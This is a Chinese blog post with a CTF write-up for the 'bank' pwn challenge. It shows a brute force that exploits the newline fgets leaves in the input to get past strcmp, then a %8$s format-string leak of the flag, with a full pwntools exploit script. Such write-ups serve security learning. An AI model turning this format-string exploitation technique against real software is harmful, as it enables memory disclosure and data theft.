第六届全国网络空间安全技术大赛 pwn bank

利用格式化字符串漏洞绕过strcmp检查
最新推荐文章于 2021-05-08 00:05:10 发布
原创 最新推荐文章于 2021-05-08 00:05:10 发布 · 713 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

"本文介绍了一种利用格式化字符串漏洞的方法来绕过strcmp函数的检查,通过爆破密码并设置特定的输入,使得程序读取flag到栈中的chunk。实验中使用了x00字符来达到目的,但fgets的输入限制要求我们找到一种方式处理回车符。最终,通过设置第一个数字为回车的ASCII值,成功触发漏洞并输出flag。"

在这里插入图片描述保护还算正常
在这里插入图片描述
需要绕过strcmp的检查

然后下面会把flag读到一个chunk中,地址在栈里面,我们可以通过格式化字符串来将它输出。

可以试一下地址的偏移是8,重点是上面怎么去绕过strcmp。
很简单的,我们可以通过’\x00’
但是问题是这道题输入是fgets,输入的时候必带回车,我们不能单输一个’\x00’,必然会有回车,所以我们只能是去爆破,password第一个数字等于我们的回车,就可以进入利用。

exp

from pwn import*

context.log_level = "debug"
context.arch = "amd64"

elf = ELF("./bank")
libc = ELF("./64/libc-2.23.so")

def exp():
    r = process("./bank")

    r.sendlineafter("Please enter your account:\n", "aa")
    r.sendlineafter("Please enter your password:\n","")
    if 'wrong' in r.recvline():
        r.close()
        return
    #r.sendline("yes")
    r.sendlineafter("Do you want to check your account balance?\n", "yes")
    r.sendlineafter("Please input your private code: \n", "%8$s")
    r.interactive()

while 1:
    exp()
2024第八届全国职工职业技能大赛“网络与信息安全管理员”河北省预选拔赛解析
Aluxian_的博客
08-03 1733
2024第八届全国职工职业技能大赛“网络与信息安全管理员”某省选拔赛解析
西安邮电大学第三届网络安全技能大赛---PWN方向WP
tbsqigongzi的博客
11-14 2830
第三届西邮校赛
2018 年(第四届)全国网络空间安全大赛 线上赛解题报告
04-27
2018 年(第四届)全国网络空间安全大赛 线上赛解题报告 主办单位:中国兵工学会信息安全与对抗技术专业委员会 承办单位:西安工业大学 协办单位:西安胡门网络技术有限公司
第六届全国网络空间安全技术大赛 pwn auto
yongbaoii的博客
05-06 796
保护正常。 main函数过大,肯定不是都有用,所以我们进来得一点一点看汇编。 第一块是设置缓冲区 这个是把var_C设置为19.通过循环的方式。 栈一个变量里面写了几个字母,然后正常输出输入。之后跳走。 要注意s2是UCIJEURI 这个函数要跑七次,作用是通过complex_function函数把我们的输入进行一个加密。 继续读main函数。 把我们输入的字符串地址防到eax,然后加1. 两个movzx作用是将输入的第二个字符取出来,因为上面加了个1。 与10h做了与运算,结果保留在eax中,然后tes
第六届全国网络空间安全技术大赛 pwn paper
yongbaoii的博客
05-06 197
这个的话就保护给的足足的。 给的libc是2.23 进去是一个菜单。 create 最多8个,然后地址放在bss上。 delete 删除,但是会发现还是简单的uaf。而且也没有检查,可以double free。 write 就是简单的往malloc里面输入数字。 find your disk move your disk 4这里可以泄露一个地址,5这里可以更改v8 最后的目的是把v9改成0xCCCCCCCC,所以我们的总体思路就是怎么能够通过uaf以及double free把v9申请到,然后做一个
第六届全国网络安全技术大赛
qq_53086690的博客
05-06 1013
一道RSA题 from gmpy2 import * import random def generatePQ(): st = random_state() p = int(mpz_urandomb(st, 2048)) q = int(mpz_urandomb(st, 2048)) while((is_prime(p, 50) and is_prime(q, 50)) == False): p = int(next_prime(p)) q
第六届全国网络空间安全技术大赛 pwn small
yongbaoii的博客
05-08 281
保护的话重点你会发现没有NX。 程序的话确实,非常的小。 主函数,调用另外一个函数然后退出。 另外一个函数就是开了一个缓冲区,大小是0x10,然后读,能读0x400,有个绝对大的溢出。 这个题关键的是,怎么根据那些已经给了的条件去做一个利用。 ...
【天格】战队-未解出题目附件-第六届“强网杯”全国网络安全挑战赛
08-01
【天格】战队在第六届“强网杯”全国网络安全挑战赛中分享了多个未解出的题目附件,这些附件涵盖了网络安全领域的多个子领域,包括逆向工程、漏洞利用(PWN)、密码学(Crypto)以及杂项(Misc)。通过分析这些文件...
精选资源
网络安全 CTF 2024年全国职工职业技能大赛
10-02
2024年全国职工职业技能大赛的网络安全CTF比赛,是在国家层面上对网络安全人才进行的一次专业能力的大比拼。这类比赛通常包含多个赛题,涵盖多种网络安全技术,如逆向工程(Reverse Engineering)、二进制分析...
精选资源
### 网络安全御网杯网络安全大赛赛题解析与技术分享:涵盖Crypto、MISC、Web、Pwn、Re等领域的解题思路与方法题解析:
最新发布
05-12
内容概要:本文详细介绍了“御网杯”网络安全大赛的赛题解析及赛事安排。赛题涵盖多个领域,包括杂项(Misc)、密码学(Crypto)、Web漏洞利用、逆向工程(Re)、Pwn等。文章不仅提供了具体的解题思路和步骤,还展示...
全国网络空间安全竞赛试题
06-22
网络空间安全试题类型、近年的竞赛状况、各省队的情况
2019年网络空间安全全国职业院校技能大赛训练题三及答案.doc
09-23
2019年网络空间安全全国职业院校技能大赛训练题三及答案
2019网络空间安全全国职业院校技能大赛专题训练题一到三全套试题及答案.zip
04-24
2019网络空间安全全国职业院校技能大赛专题训练题一到三全套试题及答案
2020全国工业互联网安全技术技能大赛题目
10-28
含有misc,re,crypto,pwn及题目说明
2017年陕西省网络空间安全技术大赛·Mobile T3
Locksk的博客
03-12 873
0x00XTUapk链接: https://pan.baidu.com/s/1OC9R6lOAKa31hjY4zZucmQ 密码: 83ag0x01JAVA层简要分析一下click监听事件,找到关键判断方法encrypt()this.button.setOnClickListener(new OnClickListener() { public void onClick(V...
2017年陕西省网络空间安全技术大赛·Mobile T1
Locksk的博客
03-11 808
0x00拯救鲁班七号CM下载网址:链接: https://pan.baidu.com/s/10EPc2KCWqcaT9wLw5eyxWw 密码: swkn界面流程:一个输入框,一个按钮。0x01JAVA层分析反汇编代码逻辑分析加载了humen.so文件,说明这是写在native层的加密方法。说明已在代码注释中,不再重复。 static { System.loadLibrary("hu...
2017年陕西省网络空间安全技术大赛·Mobile T2
Locksk的博客
03-12 877
0x00The Marauder's Mapapk链接: https://pan.baidu.com/s/1KxRb7NbR8-z5_rgD4ADI9Q 密码: y7sc0x01Java层分析略,参考:https://www.52pojie.cn/thread-603169-1-1.html0x02Native层分析用32位IDA打开test.so文件来带readbin()函数,内部调用了三处函数...
2017年陕西省网络空间安全技术大赛·Mobile T5
Locksk的博客
03-18 1732
0x00前言由于第四题较直接,一个md5的比较,fa3733c647dca53a66cf8df953c2d539通过md5查询解密出来是monkey99,然后真码就是monkey99了。这个第五题是混淆。理清逻辑还是不算难的。0x01java代码分析1.没有apk文件,只有一个jar文件【补充:JFrame是指一个计算机语言-java的GUI程序的基本思路是以JFrame为基础,它是屏幕上wind...
网络空间安全技术大赛 misc3 writep
L1am3s
05-14 1215
misc3 test.pcapngps:(用于自己记录)打开发现,是一个流量包,用wireshark打开,发现存在icmp,所以先查看一下icmp包.观察了一下,并没有存在什么特别的信息.然后再看看数据,发现request包那里有数据会改变,下面上两张图    ...(后面的不列出来了)然后尝试一下把这个当做flag值提交.= =居然就是这个O__O"…...
De1CTF网络安全大赛逆向与pwn技术解析
标签中的“pwn”和“逆向”是对描述中提到的CTF赛项内容的重复,而“网络安全大赛”则明确指出这是一个针对网络安全领域技能的竞赛。标签的作用在于快速标识出压缩包内容的类型和用途,方便参与者或研究者快速定位和...
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值